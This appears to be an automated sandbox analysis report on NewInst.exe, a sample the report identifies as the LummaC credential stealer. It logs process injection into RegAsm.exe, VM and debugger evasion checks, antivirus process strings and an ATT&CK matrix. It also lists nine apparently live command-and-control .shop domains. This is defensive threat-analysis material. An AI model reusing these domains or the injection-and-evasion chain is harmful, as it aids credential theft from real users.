Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00404E80	2_2_00404E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00419E8F	2_2_00419E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040EEA4	2_2_0040EEA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041275E	2_2_0041275E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00403F60	2_2_00403F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00423FC0	2_2_00423FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00434FE0	2_2_00434FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00411F94	2_2_00411F94

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004095B0 appears 43 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00409E90 appears 111 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1764

Source: NewInst.exe, 00000000.00000002.1667455325.00000000007BE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs NewInst.exe

Source: NewInst.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: NewInst.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/6@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0042E490 CoCreateInstance,

2_2_0042E490

Source: C:\Users\user\Desktop\NewInst.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NewInst.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Users\user\Desktop\NewInst.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7640

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\79838862-007c-43c3-9ff5-37aea44012df

Jump to behavior

Source: NewInst.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: NewInst.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\NewInst.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NewInst.exe

ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\NewInst.exe "C:\Users\user\Desktop\NewInst.exe"
Source: C:\Users\user\Desktop\NewInst.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NewInst.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1764
Source: C:\Users\user\Desktop\NewInst.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\NewInst.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: NewInst.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: NewInst.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: NewInst.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\muwoybn6mesz4\obj\Re\ease\ppZ.pdb source: NewInst.exe
Source:	Binary string: c:\muwoybn6mesz4\obj\Re\ease\ppZ.pdb0j source: NewInst.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043C808 push eax; retf 0041h	2_2_0043C809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043E828 push 4E0042BBh; retf	2_2_0043E82D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043C89E push eax; retf 0041h	2_2_0043C8AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004270A2 push eax; mov dword ptr [esp], eax	2_2_00427076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043ABDC push edi; retf 0040h	2_2_0043ABDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043ABE0 push eax; retf 0040h	2_2_0043ABF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043AC08 push eax; retf	2_2_0043AC09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043ADE8 push esi; retf	2_2_0043ADE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043E69C pushad ; iretd	2_2_0043E69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043C750 push eax; retf 0041h	2_2_0043C751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043C754 push eax; retf 0041h	2_2_0043C755

Source: NewInst.exe

Static PE information: section name: .text entropy: 7.992976484719213

Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\NewInst.exe	Memory allocated: 21B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Memory allocated: 23A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Memory allocated: 43A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\NewInst.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\NewInst.exe TID: 7632	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7656	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\NewInst.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000002.00000002.1940966413.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1940966413.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1940966413.0000000000A70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_2-12095

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0042F000 LdrInitializeThunk,

2_2_0042F000

Source: C:\Users\user\Desktop\NewInst.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\NewInst.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\NewInst.exe

Code function: 0_2_023A2499 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_023A2499

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\NewInst.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: NewInst.exe, 00000000.00000002.1667750554.00000000033A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: froytnewqowv.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\NewInst.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 437000	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43A000	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 449000	Jump to behavior
Source: C:\Users\user\Desktop\NewInst.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 733008	Jump to behavior

Source: C:\Users\user\Desktop\NewInst.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\NewInst.exe	Queries volume information: C:\Users\user\Desktop\NewInst.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: NewInst.exe, 00000000.00000002.1667455325.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: NewInst.exe, 00000000.00000002.1667455325.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	41 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Clipboard Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
